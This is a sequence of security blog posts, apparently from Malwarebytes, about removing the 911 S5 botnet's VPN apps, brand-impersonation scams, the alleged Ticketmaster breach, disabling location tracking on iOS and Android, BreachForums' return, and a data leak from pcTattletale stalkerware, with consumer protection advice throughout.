Of the infected Windows devices, 613,841 IP addresses were located in the United States. The DOJ also called the botnet a residential proxy service. Residential proxy networks allow someone in control to rent out a residential IP address which then can be used as a relay for their internet communications. This allows them to hide their true location behind the residential proxy. Cybercriminals used this service to engage in cyberattacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.

To set up this botnet, Wang and his associates provided users with free, illegitimate VPN applications that were created to connect to the 911 S5 service. Unaware of the proxy backdoor, once users downloaded and installed these VPN applications, they unknowingly became part of the 911 S5 botnet.

Sometimes the VPN applications were bundled with games and other software and installed without user consent.

For this reason, the FBI has published a public service announcement (PSA) to help users find out if they have been affected by this botnet.

Users can start by going over this list of malicious VPN applications associated with the 911 S5 botnet:

  • MaskVPN
  • DewVPN
  • PaladinVPN
  • ProxyGate
  • ShieldVPN
  • ShineVPN

If you have one of these VPN applications installed, sometimes you can find an uninstaller located under the Start menu option of the VPN application. If present, you can use that uninstall option.

If the application doesn’t present you with an uninstall option, then follow the steps below to attempt to uninstall the application:

  • Click on the Start menu (Windows button) and type “Add or remove programs” to bring up the “Add and Remove Programs” menu.
  • Search for the name of the malicious VPN application.
  • Once you find the application in the list, click on the application name, and select the “Uninstall” option.

Once you have uninstalled the application, you will want to make sure it’s no longer active. To do that, open the Windows Task manager. Press Control+Alt+Delete on the keyboard and select the “Task Manager” option or right-click on the Start menu (Windows button) and select the “Task Manager” option.

In Task Manager look under the “Process” tab for the following processes:

  • MaskVPN (mask_svc.exe)
  • DewVPN (dew_svc.exe)
  • PaladinVPN (pldsvc.exe)
  • ProxyGate (proxygate.exe, cloud.exe)
  • ShieldVPN (shieldsvc.exe)
  • ShineVPN (shsvc.exe)
Example by FBI showing processes associated with ShieldVPN in Task Manager

If found, select the service related to one of the identified malicious software applications running in the process tab and select the option “End task” to attempt to stop the process from running.

Or, download Malwarebytes Premium (there is a free trial) and run a scan.

Whether you’re using the free or paid version of the app, you can manually run a scan to check for threats on your device. 

  1. Open the app.
  2. On the main dashboard, click the Scan button.
  3. A progress page appears while the scan runs.
  4. After the scan finishes, it displays the Threat scan summary.
    • If the scan detected no threats: Click Done.
    • If the scan detected threats on your device: Review the threats found on your computer. From here, you can manually quarantine threats by selecting a detection and clicking Quarantine.
  5. Click View Report or View Scan Report to see a history of prior scans. After viewing the threat report, close the scanner window.

If neither of these options, including the Malwarebytes scan, resolve the problem, the FBI has more elaborate instructions. You can also contact the Malwarebytes Support team to assist you.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Beware of scammers impersonating Malwarebytes

Scammers love to bank on the good name of legitimate companies to gain the trust of their intended targets. Recently, it came to our attention that a cybercriminal is using fake websites for security products to spread malware. One of those websites was impersonating the Malwarebytes brand.

Very convincing fake Malwarebytes site at
Image courtesy of Trellix

The download from the fake website was an information stealer with a filename that resembled that of the actual Malwarebytes installer.

Besides some common system information, this stealer goes after:

  • Account tokens
  • Steam tokens
  • Saved card details
  • System profiles
  • Telegram logins
  • List of running process names
  • Installed browser lists and their version
  • Credentials from the browser “User Data” folder, Local DB an autofill
  • Cookies from the browser
  • List of folders on the C drive

This is just one scam, but there are always others using our name to target people. We regularly see tech support scammers pretending to be Malwarebytes to defraud their victims.

Some scammers sell—sometimes illegal—copies of Malwarebytes for prices that are boldly exaggerated.

scammer selling overpriced copy of Malwarebytes

Others will try and phish you by sending you a confirmation mail of your subscription to Malwarebytes.

phisihng mail saying it's an Order confirmation

And sometimes when you search for Malwarebytes you will find imposters in between legitimate re-sellers. Some even use our logo.

search result for Malwarebytes Premium pointing to an imposter site

In this case, Google warned us that there was danger up ahead.

Google warning for

The site itself was not as convincing as the advert, and some poking around in the source code told us the website was likely built by a Russian speaking individual.

source code including Russian error prompt

How to avoid brand scams

It’s easy to see how people can fall for fake brand notices. Here are some things that can help you avoid scams that use our name:

  • Download software directly from our sites if you are not sure of the legitimacy of the ones offered to you.
  • Check that any emails that appear to come from Malwarebytes are sent from a address.
  • If you have any questions or doubts as to the legitimacy of something, you can contact our Support team.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

The Ticketmaster “breach”—what you need to know

Earlier this week, a cybercriminal group posted an alleged database up for sale online which, it says, contains customer and card details of 560 million Live Nation/Ticketmaster users.

The data was offered for sale on one forum under the name “Shiny Hunters”. ShinyHunters is the online handle for a group of notorious cybercriminals associated with numerous data breaches, including the recent AT&T breach.

ShinyHunter offering Live Nation / TciketMaster data for sale
Post on BreachForums by ShinyHunters

The post says:

“Live Nation / Ticketmaster

Data includes

560 million customer full details (name, address, email, phone)

Ticket sales, event information, order details

CC detail – customer last 4 of card, expiration date

Customer fraud details

Much more

Price is $500k USD. One time sale.”

The same data set was offered for sale in an almost identical post on another forum by someone using the handle SpidermanData. This could be the same person or a member of the ShinyHunters group.

According to news outlet ABC, the Australian Department of Home Affairs said it is aware of a cyber incident impacting Ticketmaster customers and is “working with Ticketmaster to understand the incident.”

Some researchers expressed their doubts about the validity of the data set:

🚨🚨Thoughts on the alleged Ticketmaster Data Breach 🚨🚨

TLDR: Alert not Alarmed

The Ticketmaster data breach claim has provided BreachForums with the quick attention they need to boost their user numbers and reputation.

The claim has possibly been over-stated to boost…

— CyberKnow (@Cyberknow20) May 29, 2024

While others judged it looks legitimate based on conversations with involved individuals, and studying samples of the data set:

Today we spoke with multiple individuals privy to and involved in the alleged TicketMaster breach.

Sometime in April an unidentified Threat Group was able to get access to TicketMaster AWS instances by pivoting from a Managed Service Provider. The TicketMaster breach was not…

— vx-underground (@vxunderground) May 30, 2024

Whether or not the data is real remains to be seen. However, there’s no doubt that scammers will use this opportunity to make a quick profit.

Ticketmaster users will need to be on their guard. Read our tips below for some helpful advice on what to do in the event of a data breach.

You can also check what personal information of yours has already been exposed online with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

All parties involved have refrained from any further comments. We’ll keep you posted.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

How to turn off location tracking on iOS and iPadOS

On iOS and iPadOS, location services are typically turned on when you first set up your device. However, there may be reasons why you don’t want your device to be located, perhaps because you don’t want to be found but need to keep the device with you.

There are a few options to hide your location from prying eyes.

Please note: I will only mention iOS from here on, but the instructions are almost the same for iPadOS.

Turn off location services by app

Some apps will not work properly without location services, but it’s certainly worth checking which ones are actually using them.

  • Go to Settings > Privacy & Security > Location Services.
  • If Location Services is on, you will see a list of apps with permissions.
Apps using Location Services
  • Scroll down to select an app.
  • Now you can tap the app and select an option of Never, Ask Next Time Or When I Share, While Using the App, or Always.
  • From here, apps should provide an explanation of how they will use your location information. Some apps might offer only two options.

Turn location services off entirely

You can turn Location Services on or off at Settings > Privacy & Security > Location Services. Move the slider control to the left to turn Location Services off.

Location Services menu

Note that turning Location Services of will also disable the Find My feature for the device.

Turn off Find My iPhone

Find My iPhone allows a user to track their devices. It allows you to locate the device from another device, make it play a sound if you are close, and even remotely erase your device if you suspect it has fallen in the wrong hands.

To disable Find My iPhone:

  • Go to Settings
  • Select your account name.
  • Choose Find My
  • Turn the feature off. You will need to enter your iCloud password.
Find my iPhone screen showing how to turn off Find My iPhone

An iPhone can still be tracked in some cases, even if it is in Airplane Mode. The only way tracking is not possible is to turn the iPhone off completely.  And even then, since iOS 15, iPhone models 11 and up will transmit their location even when powered off if the Find My Network is enabled in your settings.

To turn off Find My network:

  • Go to Settings
  • Select your account name.
  • Choose Find My
  • Turn Find My network off.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

How to turn off location tracking on Android

Android devices come with location services. Some apps need access to location services to function properly. However, there may be reasons why you don’t want your device to be located, often because you don’t want to be found and the device is always with you.

Depending on who you are trying to hide your location from, there are several levels of hiding your location.

Disclaimer: the exact instructions for your make and model of Android device may look a bit different.

Turn off location for particular apps

There are apps active on most Android devices that could give away the location of the device. To check which apps have access to your device’s location:

  • Swipe down from the top of the screen.
  • Find the Location icon location pin
  • Touch and hold Location.
  • Tap App location permissions.
  • Under Allowed all the time, Allowed only while in use, and Not allowed, find the apps that can use your device’s location.
  • To change the app’s permissions, tap it. Then, choose the location access for the app.
  • If you see any apps that you don’t recognize, be sure to turn the permission off.
location in main settings menu on Android

Turn off location entirely

Alternatively, you can turn Location off entirely:

  • Swipe down from the top of the screen.
  • Find the location icon location pin
  • If it’s highlighted, tap it to turn it off.
  • You’ll see a warning that some apps may not function properly. Confirm by tapping Close.
No location access warning Android

Turn off Find My Device

Find My Device is a service which makes your device’s most recent location available to the first account activated on the device. Find My Device is included with most Android phones, and it’s automatically turned on once you add a Google account to your device.

How to turn off Find My Device:

  • Open Settings.
  • Tap (Biometrics &) Security.
  • Tap Find My Device, then tap the switch to turn it off.

Turning off Find My Device may backfire if you ever truly need to find your device because you lost it. But if someone may have the login credentials for the Google account associated with the phone, you may want to turn it off.

The last resort is to turn your phone off.

Even in airplane mode, GPS on your phone is still working. As long as a phone isn’t turned off, it’s possible to track the location because the device sends signals to nearby cell towers. Even when it’s turned off, the service provider or internet provider can show the last location once it’s switched back on.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Data leak site BreachForums is back, boasting Live Nation/Ticketmaster user data. But is it a trap?

Notorious data leak site BreachForums appears to be back online after it was seized by law enforcement a few weeks ago.

At least one of BreachForums domains and its dark web site are live again. However, questions have been raised over whether it is a genuine attempt to revive the forums once again or set up as a lure by law enforcement to entrap more data dealers and cybercriminals.

The administrator of the new forum posts under the handle ShinyHunters, which is a name associated with the AT&T breach and others, and believed to be the main administrator of the previous BreachForums.

Yesterday, ShinyHunters posted a new dataset for sale that allegedly stems from Live Nation/Ticketmaster.

Post on BreachForums by administrator ShinyHunters
Post by ShinyHunters to sell the Live Nation Ticketmaster data set

“Live Nation / Ticketmaster

Data includes

560 million customer full details (name, address, email, phone)

Ticket sales, event information, order details

CC detail – customer last 4 of card, expiration date

Customer fraud details

Much more

Price is $500k USD. One time sale.”

But, an avatar and a handle are easily copied, and there are a few things that raised our spidey-senses that something is up.

First, the data set was offered for sale on another dark web forum by a user going by SpidermanData with the exact same text.

Post by SpidermanData on another forum selling the same data set
SpidermanData offering the same data set on another forum

Second, this data set seems way too big for its nature. Live Nation and Ticketmaster are big enough to be considered a monopolist, but 560 million users seems like a stretch.

After looking at the shared evidence, security researcher CyberKnow tweeted:

“While there is some new data in the shared evidence there is also old customer information, making it possibly this is a series of data jammed together.”

Third, a new feature is that visitors need to register before they can see any content. Why would the administrators change that?

And, last but not least, would the FBI let the cybercriminals regain control over the domains that easily? That would be quite embarrassing.

So, we dare conclude that this dataset’s goal is to generate some attention and act as a lure to let old forum users know that BreachForums is alive and kicking. But who is running the show, is the question that we hope to answer soon.

Stay tuned for updates on this developing story.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
  • Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
  • Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check if your data has been breached

Our Digital Footprint portal allows you to quickly and easily check if your personal information has been exposed online. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

pcTattletale spyware leaks database containing victim screenshots, gets website defaced

The idea behind the software is simple. When the spying party installs the stalkerware, they grant permission to record what happens on the targeted Android or Windows device. The observer can then log in on an online portal and activate recording, at which point a screen capture is taken on the target’s device.

What goes around comes around, you might say. As you may have read many times before on our blog, some spyware companies have a surprisingly low standard of security .

In 2021, we reported that “employee and child-monitoring” software vendor pcTattletale hadn’t been very careful about securing the screenshots it sneakily took from its victims’ phones. A security researcher found an issue while using a trial version of pcTattleTale, noticing that the company uploaded the screenshots to an unsecured online database (meaning anyone could view the screenshots as they weren’t protected by any form of authentication—such as a user name and password).

Last week another security researcher, Eric Daigle, found the company appears to have learned nothing from its previous security issue. Daigle found that pcTattletale’s Application Programming Interface (API) allows any attacker to access the most recent screen capture recorded from any device on which the spyware is installed. Despite repeated warnings from Daigle and others, no improvements were made.

Then, yet another researcher found yet another bug in pcTattletale which allowed them to gain full access to the backend infrastructure. This allowed them to deface the website and steal the AWS credentials which turned out to be the same for all devices. Amazon has now locked pcTattletale’s entire AWS infrastructure.

After a quick sweep, stalkerware researcher, Maia Crimew stated:

“pcTattletale currently holds over 17 terabytes of victim device screenshots (upwards of 300 million of them from over 10 thousand devices), with some of them dating back to 2018.”

According to 2023 research from Malwarebytes, 62 percent of people in the United States and Canada admitted to monitoring their romantic partners online in one form or another, from looking through a spouse’s or significant other’s text messages, to tracking their location, to rifling through their search history, to even installing monitoring software onto their devices.

Given the low security of the apps available to home users, this is extremely concerning. Installing monitoring software is not just a huge invasion of privacy, there is a big chance that it will backfire.

Removing stalkerware

Malwarebytes, as one of the founding members of the Coalition Against Stalkerware, makes it a priority to detect and remove stalkerware-type apps from your device. It is good to keep in mind however that by removing the stalkerware-type app you will alert the person spying on you that you know the app is there.

Because the apps install under a different name and hide themselves from the user, it can be hard to find and remove them. That is where Malwarebytes can help you.

  1. Open your Malwarebytes dashboard
  2. Tap Scan now
  3. It may take a few minutes to scan your device.

 If malware is detected you can act on it in the following ways:

  • Uninstall. The threat will be deleted from your device.
  • Ignore Always. The file detection will be added to the Allow List, and excluded from future scans. Legitimate files are sometimes detected as malware. We recommend reviewing scan results and adding files to Ignore Always that you know are safe and want to keep.
  • Ignore Once: A file has been detected as a threat, but you are not sure whether to add it to your Allow List or delete. This option will ignore the detection this time only. It will be detected as malware on your next scan.

On Windows machines Malwarebytes detects pcTattleTale as PUP.Optional.PCTattletale.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.
